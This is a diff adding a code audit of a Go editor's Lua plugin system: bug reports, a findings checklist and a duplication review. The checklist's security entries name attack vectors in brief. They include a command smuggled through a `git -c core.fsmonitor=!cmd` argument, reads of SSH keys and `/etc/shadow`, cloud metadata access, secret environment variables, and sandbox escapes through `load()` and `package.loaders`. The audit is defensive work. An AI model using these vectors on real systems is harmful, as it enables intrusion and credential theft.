+- **Description**: The async goroutines read `p.PostAsync` (and construct closures over `p.State`) without synchronization, while `Destroy()` on the main thread sets these fields to nil concurrently. In Go, concurrent read/write of interface values without synchronization is a data race and can cause undefined behavior, including partial reads of interface values.
+- **Impact**: Undefined behavior / potential crash under concurrent plugin destruction and async completion.
+- **Fix**: Either (a) add a mutex to `Plugin` that protects `State` and `PostAsync`, locking in both the goroutine and `Destroy()`, or (b) use the `PostAsync` callback to safely check `State` on the main thread only (i.e., always post the result and check `p.State` inside the event-loop callback).
+
+## High
+
+### 3. Plugin loses all app callbacks after Update (no-approval path)
+- **File**: `internal/plugin/manager.go:306-317`, `internal/app/commands_plugin.go:209-226`
+- **Description**: When `Manager.Update()` succeeds without requiring re-approval (permissions unchanged), it calls `p.Destroy()` then `p.Init()` on the same plugin object. `Destroy()` sets all app callbacks to nil (`RequestRedraw`, `PostAsync`, `Log`, `ShowContextMenu`, `ShowConfirmDialog`, `OpenDrawer`, `CloseDrawer`, `OpenTab`, `CloseTab`). `Init()` only sets up the Lua state and runs the plugin script; it does NOT restore any app callbacks. The caller `handlePluginUpdateResult` only calls `pluginsPanel.Refresh()` -- it does NOT call `wirePlugin()`. The `Editor`, `Filesystem`, `System`, and `Network` API interfaces survive (not cleared by `Destroy`), but all UI integration callbacks are nil.
+- **Impact**: After updating a plugin (that doesn't need re-approval), the plugin silently loses: logging (`ttt.log` does nothing), redraw requests, context menus, confirm dialogs, drawer/tab operations, and all async result delivery. The plugin appears to work but UI interactions fail silently.
+- **Fix**: In `handlePluginUpdateResult`, when `result.plugin == nil && result.err == nil` (the no-approval update path), look up the plugin by name and call `wirePlugin(p)` to re-establish all callbacks. Also need to remove and re-add sidebar/bottom panels in the UI.
+
+### 4. Plugin not wired after SetEnabled(true)
+- **File**: `internal/plugin/manager.go:323-364`, `cmd/ttt/main.go:207-211`
+- **Description**: When `Manager.SetEnabled(name, true)` is called, it creates a new `Plugin` object, calls `Init()`, appends to `m.plugins`, and calls `collectRegistrations()`. However, the new plugin has nil values for: `RequestRedraw`, `PostAsync`, `Log`, `ShowContextMenu`, `ShowConfirmDialog`, `ShowInfoDialog`, `OpenDrawer`, `CloseDrawer`, `OpenTab`, `CloseTab`, `Editor`, `Filesystem`, `System`, `Network`, and `Borders`. The caller in `main.go` (the `OnToggle` handler) only calls `pluginsPanel.Refresh()` -- it does NOT call `wirePlugin()` or any of the `SetEditorAPI`/`SetFilesystemAPI`/etc methods.
+- **Impact**: Re-enabling a previously disabled plugin creates a non-functional plugin. All API calls from Lua return empty/nil results. All UI callbacks do nothing. The plugin panel may render (if it only uses static widgets) but any interactive features fail silently.
+- **Fix**: After `SetEnabled(name, true)`, the caller should call `wirePlugin(p)` on the newly enabled plugin to set up all app-level callbacks and API interfaces. Requires returning the new plugin from `SetEnabled` or looking it up afterward.
+
+### 5. Duplicate panel registrations accumulate after Update
+- **File**: `internal/plugin/manager.go:316`
+- **Description**: In `Manager.Update()` (no-approval path, line 316), `collectRegistrations(p)` appends new `SidebarRegistration`/`BottomRegistration` entries to the Manager's panel lists without removing the old entries for the same plugin. Each update adds another set of registrations. The old registrations reference stale `PluginPanelWidget` objects whose render functions were from the previous Lua state.
+- **Impact**: Manager's `SidebarPanels`/`BottomPanels` lists grow unboundedly with stale entries on each update. While the stale entries don't cause immediate crashes (old render funcs are nil, handled gracefully), they waste memory and could cause confusion if iterated over by other code (e.g., `wirePlugin` iterates `SidebarPanels` to find matching registrations).
+- **Fix**: Before calling `collectRegistrations(p)` in `Update()`, remove existing entries for this plugin from `m.SidebarPanels` and `m.BottomPanels`, similar to how `Reload()` does it (lines 409-418).
+
+## Medium
+
+### 6. Lua `event.mod == nil` check never matches (on_event 'r' shortcut broken)
+- **File**: `internal/plugin/event_convert.go:33-41`, `plugins/go-test-runner/plugin.lua:486`, `plugins/docker-manager/init.lua:367`, `plugins/todo-scanner/plugin.lua:244`
+- **Description**: In `keyEventToLua`, the `mod` field is always set to a Lua string: `""` when no modifier is pressed, `"ctrl"`, `"alt"`, or `"shift"` otherwise. Three Lua plugins check `event.mod == nil` to detect "no modifier pressed". In Lua, an empty string `""` is NOT `nil`, so this comparison is always false. The condition `event.key == "r" and event.mod == nil` never evaluates to true.
+- **Impact**: The 'r' keyboard shortcut for refreshing/rescanning within the sidebar/bottom panels of go-test-runner, docker-manager, and todo-scanner plugins does not work. Users must use the command palette instead.
+- **Fix**: Either (a) change the Lua plugins to check `event.mod == ""` instead of `event.mod == nil`, or (b) change `event_convert.go` to not set the `mod` field when no modifier is present (so accessing it returns `nil` in Lua), or (c) change the Go code to set `lua.LNil` when mod is empty: `if mod == "" { L.SetField(tbl, "mod", lua.LNil) }`.
+
+### 7. HTTP client plugin calls editor.insert() with wrong argument count
+- **File**: `plugins/http-client/plugin.lua:153`
+- **Description**: The plugin calls `editor.insert(text)` with a single string argument (the HTTP response body). The Go binding `editorInsert` expects three arguments: `(line, col, text)`, where line and col are numbers. `L.CheckNumber(1)` is called on the string argument, which fails because a string is not a number.
+- **Impact**: Clicking the "Insert to editor" button in the HTTP client plugin always fails with a Lua type error. The error is caught by `Protect: true` and logged, but the insert never happens.
+- **Fix**: Change line 153 to pass cursor position: `local pos = editor.cursor(); editor.insert(pos.line, pos.col, text)` (matching how `color-picker/plugin.lua:110` does it).
+
+### 8. Nested widget reconciliation ignores child type mismatches
+- **File**: `internal/plugin/widget_builder.go:127-187`
+- **Description**: When `updateWidget` reconciles children of container widgets (VStack, HStack, Box, ScrollView), it matches children by index only: `if i < len(vs.Children)`. It does NOT check whether the existing child widget's type matches the descriptor's `Kind`. If the types differ, the type assertion in `updateWidget` silently fails (e.g., `if lw, ok := w.(*widgets.LabelWidget); ok` is false for an InputWidget), and the old widget is kept as-is in the new children list: `children[i] = vs.Children[i]`.
+- **Impact**: If a Lua plugin conditionally renders different widget types within a container (e.g., showing a label when loading, then an input when loaded), the old widget type persists after the condition changes. The user sees stale widgets of the wrong type until the root-level reconciliation creates a new container. This primarily affects dynamic UIs within `vstack`, `hstack`, `box`, and `scrollview` containers.
+- **Fix**: Check the widget kind before attempting an update. If the kinds don't match, create a new widget instead of reusing the old one:
+  ```go
+  if i < len(vs.Children) && widgetMatchesKind(vs.Children[i], cd.Kind) {
+      updateWidget(vs.Children[i], cd, p)
+      children[i] = vs.Children[i]
+  } else {
+      children[i] = createWidget(cd, p)
+  }
+  ```
+
+### 9. keyEventToLua drops combined modifiers
+- **File**: `internal/plugin/event_convert.go:33-41`
+- **Description**: The modifier detection uses `else if` chains, so only the first matching modifier is reported. If a key event has both Ctrl and Shift (e.g., Ctrl+Shift+A), only `"ctrl"` is reported. The shift modifier is lost.
+- **Impact**: Lua plugins cannot distinguish between `Ctrl+Key` and `Ctrl+Shift+Key` events. If a plugin needs to handle shifted control combinations, the modifier information is incomplete. In practice this is partially mitigated by the CLAUDE.md note that ctrl+shift combos are unreliable in terminals, but the event data is still incorrect.
+- **Fix**: Build a composite modifier string or return a table of active modifiers. For example: `mod = "ctrl+shift"` or `{ ctrl = true, shift = true }`.
+
+### 10. ScrollViewWidget WheelDown doesn't clamp scrollY
+- **File**: `internal/widgets/scrollview.go:143-146`
+- **Description**: When handling `WheelDown` mouse events, `scrollY` is incremented by 3 without any upper-bound clamping. While `clamp()` is called during `Render()` which corrects the value before drawing, between the event and the next render, `scrollY` can exceed `contentH - viewH`. If any code reads `scrollY` between event handling and rendering (e.g., `EnsureVisible`), it could compute incorrect visibility offsets.
+- **Impact**: Minor visual glitch potential. The clamp in `Render` prevents out-of-bounds drawing, but intermediate state is inconsistent.
+- **Fix**: Add clamping after incrementing:
+  ```go
+  sv.scrollY += 3
+  // clamp will be done in Render, but for consistency:
+  // max := contentH - viewH; if sv.scrollY > max { sv.scrollY = max }
+  return EventConsumed
+  ```

--- a/audit/checklist.md
+++ b/audit/checklist.md
@@ -1,0 +1,104 @@
+# Plugin System Audit Checklist
+
+## Critical
+
+- [ ] **`load()` available in sandbox** [Security] — allows arbitrary Lua code compilation at runtime, defeating the module allowlist. See `security.md` §Critical C1
+- [ ] **`package.loaders` bypass** [Security] — plugins can call the filesystem loader directly to load and execute any `.lua` file on disk, bypassing the `require` wrapper. See `security.md` §Critical C2
+- [ ] **Filesystem API has zero path restrictions** [Security] — `fs.read`/`fs.write` accept any path (`~/.ssh/id_rsa`, `/etc/shadow`, etc.) with no sandboxing. See `security.md` §Critical C3
+- [ ] **Command injection via allowed binary arguments** [Security] — `system.exec` validates binary names but not arguments; `git -c core.fsmonitor=!cmd status` executes arbitrary commands. See `security.md` §Critical C4
+- [ ] **Nil pointer dereference in async callbacks after plugin destroy** [Bug] — `p.State` is nil when `resultFn` runs if plugin was destroyed mid-async, causing panic. See `bugs.md` §Critical #1
+- [ ] **Data race on plugin fields from goroutines** [Bug] — async goroutines read `p.PostAsync`/`p.State` without synchronization while `Destroy()` nils them concurrently. See `bugs.md` §Critical #2
+
+## High
+
+- [ ] **Path traversal in manifest `entry` field** [Security] — `../` in `entry` causes `DoFile` to execute arbitrary `.lua` files outside the plugin directory. See `security.md` §High H1
+- [ ] **No SSRF protection in network API** [Security] — plugins can hit `localhost`, internal IPs, cloud metadata (`169.254.169.254`), and `file://` URLs. See `security.md` §High H2
+- [ ] **Unbounded HTTP response body** [Security] — `io.ReadAll` with no size limit; a malicious server can OOM the editor. See `security.md` §High H3
+- [ ] **Environment variable access is completely unscoped** [Security] — `system.env` exposes all env vars (`AWS_SECRET_ACCESS_KEY`, `GITHUB_TOKEN`, etc.). See `security.md` §High H4
+- [ ] **Plugin install via `git clone` with limited URL validation** [Security] — accepts `file://`, SSH, and custom protocols; cloned hooks could run on `git pull` during update. See `security.md` §High H5
+- [ ] **Plugin loses all app callbacks after Update (no-approval path)** [Bug] — `Destroy()` nils all callbacks, `Init()` does not restore them, caller does not call `wirePlugin()`. See `bugs.md` §High #3
+- [ ] **Plugin not wired after `SetEnabled(true)`** [Bug] — new plugin object has nil callbacks and API interfaces; `wirePlugin()` is never called. See `bugs.md` §High #4
+- [ ] **Duplicate panel registrations accumulate after Update** [Bug] — `collectRegistrations` appends without removing old entries, growing lists unboundedly with stale refs. See `bugs.md` §High #5
+- [ ] **Plugin package directly imports tcell** [Architecture] — `event_convert.go`, `panel_widget.go`, `widget_builder.go` violate the rule that only `internal/term/` imports tcell. See `architecture.md` §V1
+- [ ] **Duplicate style maps across files** [Architecture/Duplication] — `styleMap` and `reverseStyleMap` are manually mirrored in `lua_panel.go` and `sandbox.go`; adding a style requires editing both. See `architecture.md` §V2, `duplication.md` §High #5
+
+## Medium
+
+- [ ] **`getfenv`/`setfenv` allow environment manipulation** [Security] — plugins can inspect sandbox wrapper internals via `getfenv(require)`. See `security.md` §Medium M1
+- [ ] **`rawset`/`rawget` bypass metatables** [Security] — could defeat future access-control metatables; low risk now due to per-plugin VM isolation. See `security.md` §Medium M2
+- [ ] **No execution timeout on Lua VM** [Security] — infinite loops in `init()` or callbacks freeze the editor permanently. See `security.md` §Medium M3
+- [ ] **No memory limits on Lua VM** [Security] — unbounded allocation via `string.rep` or large tables can OOM-kill the process. See `security.md` §Medium M4
+- [ ] **No limit on concurrent async operations** [Security] — a plugin can spawn unlimited goroutines via `exec_async`/`get_async`/`post_async`, exhausting PIDs and FDs. See `security.md` §Medium M6
+- [ ] **`print` writes to stdout, corrupting terminal state** [Security] — `print()` from plugins bypasses tcell and corrupts the TUI display. See `security.md` §Medium M7
+- [ ] **`event.mod == nil` check never matches** [Bug] — `mod` is always a string (never nil), so the `r` key shortcut in go-test-runner, docker-manager, and todo-scanner never fires. See `bugs.md` §Medium #6
+- [ ] **HTTP client plugin calls `editor.insert()` with wrong argument count** [Bug] — passes `(text)` instead of `(line, col, text)`, causing a type error on every click. See `bugs.md` §Medium #7
+- [ ] **Nested widget reconciliation ignores child type mismatches** [Bug] — children matched by index only; type changes within containers keep the old widget. See `bugs.md` §Medium #8
+- [ ] **`keyEventToLua` drops combined modifiers** [Bug] — `else if` chain reports only the first modifier; `Ctrl+Shift` events lose the shift. See `bugs.md` §Medium #9
+- [ ] **`ScrollViewWidget` WheelDown doesn't clamp `scrollY`** [Bug] — `scrollY` can exceed bounds between event and render; corrected at draw time but intermediate state is inconsistent. See `bugs.md` §Medium #10
+- [ ] **Plugin struct has 10 callback fields (god struct)** [Architecture] — every host capability is a separate field; `wirePlugin` is 100+ lines; `Destroy()` has 14 nil-assignments. See `architecture.md` §D1
+- [ ] **Lua callback fields leak into `WidgetDesc`** [Architecture] — `WidgetDesc` stores `*lua.LFunction` pointers, coupling descriptors to gopher-lua types. See `architecture.md` §D2
+- [ ] **Manager imports `internal/config` for a single path call** [Architecture] — uses `config.ConfigFilePath()` only for registry path; prevents isolated testing. See `architecture.md` §D3
+- [ ] **Manager shells out to `git` directly** [Architecture] — `Install()`/`Update()` use `os/exec` with no interface; impossible to unit test. See `architecture.md` §D4
+- [ ] **`sandbox.go` imports `internal/markdown`** [Architecture] — creates transitive dependency chain `plugin -> markdown -> core/highlight + term`. See `architecture.md` §D5
+- [ ] **`OpenDrawer`/`OpenTab` callbacks take `*lua.LFunction` parameters** [Architecture] — Lua types leak through Plugin struct into the app layer. See `architecture.md` §D6
+- [ ] **App package imports gopher-lua** [Architecture] — `commands_plugin.go` imports `lua` because callbacks expose `*lua.LFunction`. See `architecture.md` §Coupling C1
+- [ ] **`PluginPanelWidget` lives in plugin package instead of widgets** [Architecture] — a UI widget that handles rendering and events sits in the plugin package, forcing a tcell import. See `architecture.md` §Coupling C2
+- [ ] **Two separate widget builder systems** [Architecture] — `widgets/builder.go` (JSON) and `plugin/widget_builder.go` (Lua) duplicate construction patterns; new widget types need changes in both. See `architecture.md` §Coupling C3
+- [ ] **`PanelProxy` couples Lua parsing with descriptor construction** [Architecture] — each `panel*Widget` function interleaves Lua table extraction and `WidgetDesc` building, making isolated testing impossible. See `architecture.md` §Coupling C4
+- [ ] **Event dispatch uses type assertions in the event loop** [Architecture] — each new async plugin operation adds another case to the type switch; central choke point. See `architecture.md` §Coupling C5
+- [ ] **Children-update pattern duplicated 4 times in `updateWidget`** [Duplication] — identical reconciliation loop for VStack, HStack, ScrollView, and Box. See `duplication.md` §High #1
+- [ ] **`checkPanelProxy` nil-guard boilerplate in every widget parser** [Duplication] — same 4-line block repeated 18 times in `lua_panel.go`. See `duplication.md` §High #2
+- [ ] **API nil-guard boilerplate across all Lua bindings** [Duplication] — `p.Editor == nil` / `p.Filesystem == nil` / etc. guards repeated 25 times across 4 files. See `duplication.md` §High #3
+- [ ] **`hasFocusedChild` and `collectFocusable` duplicate type-switch tree** [Duplication] — 7 identical cases in parallel; every new container widget needs both updated. See `duplication.md` §High #4
+- [ ] **Async callback pattern repeated 3 times** [Duplication] — `sysExecAsync`, `netGetAsync`, `netPostAsync` share identical goroutine/PostAsync/error-logging structure. See `duplication.md` §Medium #6
+- [ ] **Tree/List widget parsers share most field extraction** [Duplication] — `panelTreeWidget` and `panelListWidget` parse the same fields; List is Tree without `indent`/`on_expand`. See `duplication.md` §Medium #7
+- [ ] **Container parsers share `render` + `collectChildren` extraction** [Duplication] — VStack, HStack, ScrollView, Box all start with the same child-collection block. See `duplication.md` §Medium #8
+- [ ] **`Set*API` boilerplate in Manager** [Duplication] — 5 consecutive methods with identical `for _, p := range m.plugins { p.X = api }` pattern. See `duplication.md` §Medium #9
+- [ ] **`last_panel` + `initialized` + lazy-init boilerplate in every plugin** [Duplication] — 6 plugins repeat 6-8 lines of identical panel lifecycle boilerplate. See `duplication.md` §Medium #10
+- [ ] **Notepad plugin rolls its own JSON encoder/decoder (106 lines)** [Duplication] — hand-written JSON parser; provide a built-in `ttt.json` module instead. See `duplication.md` §Medium #11
+- [ ] **`fs.write()` error return differs from `fs.read()`/`fs.list()`** [API/Tests] — write returns single error string; reads return `nil, error_string`. See `api-consistency.md` §API #1
+- [ ] **Error handling pattern differs across modules** [API/Tests] — fs uses multi-return, system uses table with `exit_code`, net uses table with `error`, editor silently no-ops. See `api-consistency.md` §API #2
+- [ ] **"API not available" handling inconsistent** [API/Tests] — fs returns nil+error, system/net raise Lua error, editor returns empty silently. See `api-consistency.md` §API #3
+- [ ] **`sys.exec_async` requires args but `sys.exec` does not** [API/Tests] — `exec("binary")` works, but `exec_async("binary", callback)` misinterprets callback as args table. See `api-consistency.md` §API #4
+- [ ] **Box model documentation mismatch** [API/Tests] — code supports box model on `box` widget, but PLUGINS.md and CLAUDE.md omit it. See `api-consistency.md` §API #6
+- [ ] **Divider widget has dead `applyBoxModel` call** [API/Tests] — `createDividerWidget` calls `applyBoxModel` but parser never reads box model fields. See `api-consistency.md` §API #7
+- [ ] **`ttt.open_drawer()` and `ttt.close_drawer()` undocumented** [API/Tests] — implemented in `sandbox.go` with `panel.drawer` permission but missing from PLUGINS.md. See `api-consistency.md` §Doc #1
+- [ ] **`ttt.open_tab()` and `ttt.close_tab()` undocumented** [API/Tests] — implemented with `panel.editor` permission but missing from PLUGINS.md. See `api-consistency.md` §Doc #2
+- [ ] **`ttt.markdown()` undocumented** [API/Tests] — renders markdown to styled spans but missing from PLUGINS.md. See `api-consistency.md` §Doc #3
+- [ ] **`key_commands` on tree/list widgets undocumented** [API/Tests] — maps single-char keys to commands via `on_command`, not mentioned in PLUGINS.md. See `api-consistency.md` §Doc #4
+- [ ] **Extra styles available but undocumented** [API/Tests] — `bold`, `code`, and 11 `syntax_*` styles exist in `styleMap` but are not listed in PLUGINS.md. See `api-consistency.md` §Doc #5
+- [ ] **HStack `height` field undocumented** [API/Tests] — parsed in code but not listed in PLUGINS.md config fields. See `api-consistency.md` §Doc #6
+- [ ] **Label `width` field undocumented** [API/Tests] — parsed in code but not listed in PLUGINS.md config fields. See `api-consistency.md` §Doc #7
+- [ ] **`panel.editor` and `panel.drawer` permissions not fully documented** [API/Tests] — permissions are listed but their corresponding APIs are undocumented. See `api-consistency.md` §Doc #8
+- [ ] **CLAUDE.md widget API section is outdated** [API/Tests] — missing `keyvalue`, `hstack`, `scrollview`, `divider` widgets and `key_commands` feature. See `api-consistency.md` §Doc #9
+- [ ] **No unit tests for widget descriptor building** [API/Tests] — `lua_panel.go` widget-building functions untested; primary plugin authoring surface. See `api-consistency.md` §Test #4
+- [ ] **No tests for async functions** [API/Tests] — `sysExecAsync`, `netGetAsync`, `netPostAsync` goroutine/callback paths untested. See `api-consistency.md` §Test #5
+- [ ] **No tests for critical widget files** [API/Tests] — `tree.go`, `scrollview.go`, `box.go`, `hstack.go`, `vstack.go` have no dedicated tests. See `api-consistency.md` §Test #7
+- [ ] **No tests for drawer/tab APIs** [API/Tests] — `ttt.open_drawer`, `ttt.close_drawer`, `ttt.open_tab`, `ttt.close_tab` untested. See `api-consistency.md` §Test #1
+- [ ] **No tests for `ttt.show_info` and `ttt.confirm`** [API/Tests] — dialog callbacks in `sandbox.go` untested. See `api-consistency.md` §Test #2
+- [ ] **No tests for `Manager` lifecycle methods** [API/Tests] — Install, Uninstall, Update, Reload, SetEnabled have no tests. See `api-consistency.md` §Test #6
+- [ ] **No e2e tests for bottom panel plugins** [API/Tests] — only sidebar panels are e2e-tested; bottom panel rendering and tab switching untested. See `api-consistency.md` §Test #8
+- [ ] **No e2e tests for plugin commands and keybindings** [API/Tests] — command palette appearance and keybinding triggering untested at e2e level. See `api-consistency.md` §Test #9
+
+## Low/Informational
+
+- [ ] **Plugin keybinding hijacking** [Security] — plugins can override critical keybindings like `ctrl+s`; no protected set exists. See `security.md` §Informational I1
+- [ ] **Plugin command ID collisions** [Security] — plugins can register IDs matching built-in commands (e.g., `editor.save`). See `security.md` §Informational I2
+- [ ] **No content-type validation on HTTP responses** [Security] — binary responses converted to string consume excess memory. See `security.md` §Informational I3
+- [ ] **Registry file permissions too broad** [Security] — `plugins.ttt.json` written with `0644` instead of `0600`. See `security.md` §Informational I4
+- [ ] **No cryptographic verification of plugins** [Security] — `git clone` with no signature or checksum validation. See `security.md` §Informational I5
+- [ ] **`string.rep` as memory exhaustion vector** [Security] — subset of M4 (no memory limits); `string.rep("A", 2^30)` allocates 1GB. See `security.md` §Informational I6
+- [x] **Each plugin gets a separate Lua VM** [Security] — positive finding: strong cross-plugin isolation. See `security.md` §Informational I7
+- [x] **`Protect: true` prevents Lua panics from crashing Go** [Security] — positive finding: all `CallByParam` uses `Protect: true`. See `security.md` §Informational I8
+- [ ] **`net.get_async` callback position flexible but `net.post_async` is not** [API/Tests] — minor asymmetry; `post_async` always requires opts at position 2. See `api-consistency.md` §API #5
+- [ ] **No tests for `ttt.markdown`** [API/Tests] — markdown rendering return format untested. See `api-consistency.md` §Test #3
+- [ ] **No tests for `Manager.DispatchEvent` type conversion** [API/Tests] — string/int/bool to lua.LValue conversion in dispatch untested. See `api-consistency.md` §Test #10
+- [ ] **No functional (blackbox) tests for plugin features** [API/Tests] — `tests/functional/` has no plugin system tests. See `api-consistency.md` §Test #11
+- [ ] **Focusable/SetFocused/IsFocused 3-line boilerplate on every widget** [Duplication] — idiomatic Go pattern; could embed `FocusableBase` but some widgets override. See `duplication.md` §Low #12
+- [ ] **`Height()`/`Width()` returning 0 defaults repeated across widgets** [Duplication] — `BaseWidget` could provide defaults but savings would be minimal. See `duplication.md` §Low #13
+- [ ] **`HandleEvent` delegation pattern in container widgets** [Duplication] — 3 containers share 5-line delegation loop; may diverge. See `duplication.md` §Low #14
+- [ ] **`createTreeWidget` and `createListWidget` nearly identical** [Duplication] — only difference is `Indent` field; keeping separate aids readability. See `duplication.md` §Low #15
+- [ ] **Docker plugin `cmd_prune_*` handlers repeat confirm-exec-refresh** [Duplication] — 3 identical patterns within one plugin file. See `duplication.md` §Low #16
+- [ ] **Docker plugin `*_items` list-building functions share pattern** [Duplication] — 3 similar loops in one plugin; structures differ enough that abstraction hurts readability. See `duplication.md` §Low #17
+- [ ] **Docker plugin `refresh_*` functions share fetch-parse-store pattern** [Duplication] — 3 async fetch loops in one plugin; parsing differs per resource type. See `duplication.md` §Low #18
+- [ ] **Editor API getters follow uniform closure-nil-check-push pattern** [Duplication] — 6 identical-shaped simple string getters could use a helper. See `duplication.md` §Low #19

--- a/audit/duplication.md
+++ b/audit/duplication.md
@@ -1,0 +1,353 @@
+# Code Duplication Audit
+
+## High Impact (consolidation would significantly reduce maintenance burden)
+
+### 1. Children-update pattern duplicated 4 times in updateWidget
+
+- **Locations**:
+  - `internal/plugin/widget_builder.go:126-137` (WidgetVStack)
+  - `internal/plugin/widget_builder.go:139-150` (WidgetHStack)
+  - `internal/plugin/widget_builder.go:154-167` (WidgetScrollView, nested in ScrollView -> VStack)
+  - `internal/plugin/widget_builder.go:169-187` (WidgetBox, nested in Box -> VStack)
+- **Pattern**: The same reconciliation loop is copy-pasted 4 times:
+  ```go
+  children := make([]widgets.Widget, len(desc.Children))
+  for i, cd := range desc.Children {
+      if i < len(existingChildren) {
+          updateWidget(existingChildren[i], cd, p)
+          children[i] = existingChildren[i]
+      } else {
+          children[i] = createWidget(cd, p)
+      }
+  }
+  container.Children = children
+  ```
+  The only difference is unwrapping the container type (VStack vs HStack vs ScrollView.Child vs Box.Child).
+- **Occurrences**: 4 times
+- **Suggestion**: Extract a `reconcileChildren(existing []widgets.Widget, descs []WidgetDesc, p *Plugin) []widgets.Widget` helper. Each case then becomes a 2-line unwrap + assign. This would also centralize the reconciliation logic if it needs to handle removals or key-based matching in the future.
+
+### 2. `checkPanelProxy` nil-guard boilerplate in every widget parser
+
+- **Locations**:
+  - `internal/plugin/lua_panel.go:203-206` (panelLabelWidget)
+  - `internal/plugin/lua_panel.go:237-240` (panelTitleWidget)
+  - `internal/plugin/lua_panel.go:262-266` (panelKeyValueWidget)
+  - `internal/plugin/lua_panel.go:291-295` (panelTreeWidget)
+  - `internal/plugin/lua_panel.go:326-330` (panelListWidget)
+  - `internal/plugin/lua_panel.go:355-359` (panelButtonWidget)
+  - `internal/plugin/lua_panel.go:375-379` (panelInputWidget)
+  - `internal/plugin/lua_panel.go:471-475` (panelVStackWidget)
+  - `internal/plugin/lua_panel.go:491-495` (panelHStackWidget)
+  - `internal/plugin/lua_panel.go:514-518` (panelDividerWidget)
+  - `internal/plugin/lua_panel.go:525-529` (panelScrollViewWidget)
+  - `internal/plugin/lua_panel.go:542-546` (panelBoxWidget)
+  - `internal/plugin/lua_panel.go:578-582` (panelDropdownWidget)
+  - `internal/plugin/lua_panel.go:141-145` (panelSize)
+  - `internal/plugin/lua_panel.go:152-156` (panelCell)
+  - `internal/plugin/lua_panel.go:170-175` (panelText)
+  - `internal/plugin/lua_panel.go:186-190` (panelClear)
+  - `internal/plugin/lua_panel.go:603-607` (panelRedraw)
+- **Pattern**: Every panel method starts with the identical 4-line block:
+  ```go
+  proxy := checkPanelProxy(L)
+  if proxy == nil {
+      return 0
+  }
+  ```
+- **Occurrences**: 18 times
+- **Suggestion**: This is intrinsic to gopher-lua's method dispatch pattern; the boilerplate cannot be easily eliminated without a wrapper that loses type safety. **Acceptable duplication** given the framework constraints -- but the repetition is worth noting because if the error handling ever changes (e.g., returning an error string to Lua), all 18 sites need updating. A possible mitigation: a higher-order function `withProxy(fn func(*PanelProxy, *lua.LState) int) lua.LGFunction` that encapsulates the nil-check, reducing each widget method to a single wrapper line.
+
+### 3. `p.Editor == nil` / `p.Filesystem == nil` / `p.System == nil` / `p.Network == nil` guard in every API binding
+
+- **Locations**:
+  - `internal/plugin/lua_editor.go:43,54,70,81,100,118,129,140,151,162,175,190,202,216` (14 occurrences)
+  - `internal/plugin/lua_fs.go:33,52,69,81` (4 occurrences)
+  - `internal/plugin/lua_system.go:34,72,124` (3 occurrences)
+  - `internal/plugin/lua_net.go:62,79,101,133` (4 occurrences)
+- **Pattern**: Every API function starts with a nil check on the corresponding API interface, returning an empty/error value. In `lua_editor.go`, 14 functions all begin:
+  ```go
+  if p.Editor == nil {
+      L.Push(lua.LString(""))  // or L.Push(L.NewTable()) etc
+      return 1
+  }
+  ```
+- **Occurrences**: 25 times total across 4 files
+- **Suggestion**: Create a generic guard wrapper per API domain:
+  ```go
+  func editorGuard(p *Plugin, L *lua.LState, fallback lua.LValue, fn func()) int {
+      if p.Editor == nil { L.Push(fallback); return 1 }
+      fn()
+      return ...
+  }
+  ```
+  Or, since the permission check already gates whether the function is even registered, the nil check is a defense-in-depth belt-and-suspenders. If the API wiring is reliable, these checks could be removed entirely (making this dead code). If they must stay, a higher-order function wrapper would reduce the per-function overhead from 4 lines to 1.
+
+### 4. `hasFocusedChild` and `collectFocusable` duplicate the same type-switch tree
+
+- **Locations**:
+  - `internal/widgets/surface.go:46-84` (`hasFocusedChild`)
+  - `internal/widgets/focus.go:41-79` (`collectFocusable`)
+- **Pattern**: Both functions have identical type-switch structures to walk the widget tree:
+  ```go
+  switch v := w.(type) {
+  case *VStackWidget:
+      for _, child := range v.Children { recurse(child) }
+  case *HStackWidget:
+      for _, child := range v.Children { recurse(child) }
+  case *BoxWidget:
+      if v.Child != nil { recurse(v.Child) }
+  case *ScrollViewWidget:
+      if v.Child != nil { recurse(v.Child) }
+  case *TabbedWidget: ...
+  case *DialogWidget: ...
+  case *DrawerWidget: ...
+  }
+  ```
+  Every new container widget requires updating both functions.
+- **Occurrences**: 2 parallel type-switches with 7 identical cases each
+- **Suggestion**: Add a `Children() []Widget` method to a `ContainerWidget` interface (or add it to `Widget` with a default nil return via `BaseWidget`). Both tree walkers would then use a single generic traversal:
+  ```go
+  func walkWidgetTree(w Widget, visit func(Widget)) {
+      visit(w)
+      if c, ok := w.(ContainerWidget); ok {
+          for _, child := range c.Children() { walkWidgetTree(child, visit) }
+      }
+  }
+  ```
+  This also future-proofs against forgetting to update one of the two switch statements when adding new container types.
+
+### 5. `styleMap` and `reverseStyleMap` are manually-maintained mirror copies
+
+- **Locations**:
+  - `internal/plugin/lua_panel.go:13-37` (`styleMap`: `map[string]term.Style`)
+  - `internal/plugin/sandbox.go:13-37` (`reverseStyleMap`: `map[term.Style]string`)
+- **Pattern**: Both maps contain the same 22 style entries, one as name->constant and the other as constant->name. Adding a new style requires updating both maps in two different files.
+- **Occurrences**: 2 maps, 22 entries each
+- **Suggestion**: Define one canonical list (e.g., `var styleEntries = []struct{ Name string; Style term.Style }{...}`) and generate both maps from it at init time. Alternatively, define only `styleMap` and generate `reverseStyleMap` by iterating:
+  ```go
+  var reverseStyleMap = func() map[term.Style]string {
+      m := make(map[term.Style]string, len(styleMap))
+      for name, style := range styleMap { m[style] = name }
+      return m
+  }()
+  ```
+
+## Medium Impact
+
+### 6. Async callback pattern repeated across `sysExecAsync`, `netGetAsync`, `netPostAsync`
+
+- **Locations**:
+  - `internal/plugin/lua_system.go:91-118` (`sysExecAsync`)
+  - `internal/plugin/lua_net.go:114-128` (`netGetAsync`)
+  - `internal/plugin/lua_net.go:149-162` (`netPostAsync`)
+- **Pattern**: All three async functions follow the same structure:
+  ```go
+  go func() {
+      // do work
+      resultFn := func() {
+          tbl := buildResultTable(...)
+          if callErr := p.CallLuaFunc(callback, tbl); callErr != nil {
+              slog.Error("plugin async ... callback error", "plugin", p.Name, "error", callErr)
+          }
+      }
+      if p.PostAsync != nil {
+          p.PostAsync(&PluginAsyncResult{Plugin: p, Callback: resultFn})
+      }
+  }()
+  ```
+  The goroutine launch, error logging, and PostAsync dispatch are identical.
+- **Occurrences**: 3 times
+- **Suggestion**: Extract a `p.runAsync(fn func() (lua.LValue, error), callback *lua.LFunction)` helper that handles the goroutine, PostAsync wiring, and error logging. Each async binding then only needs to provide the work function and the callback.
+
+### 7. Tree/List widget parsers in `lua_panel.go` share most field extraction
+
+- **Locations**:
+  - `internal/plugin/lua_panel.go:291-323` (`panelTreeWidget`)
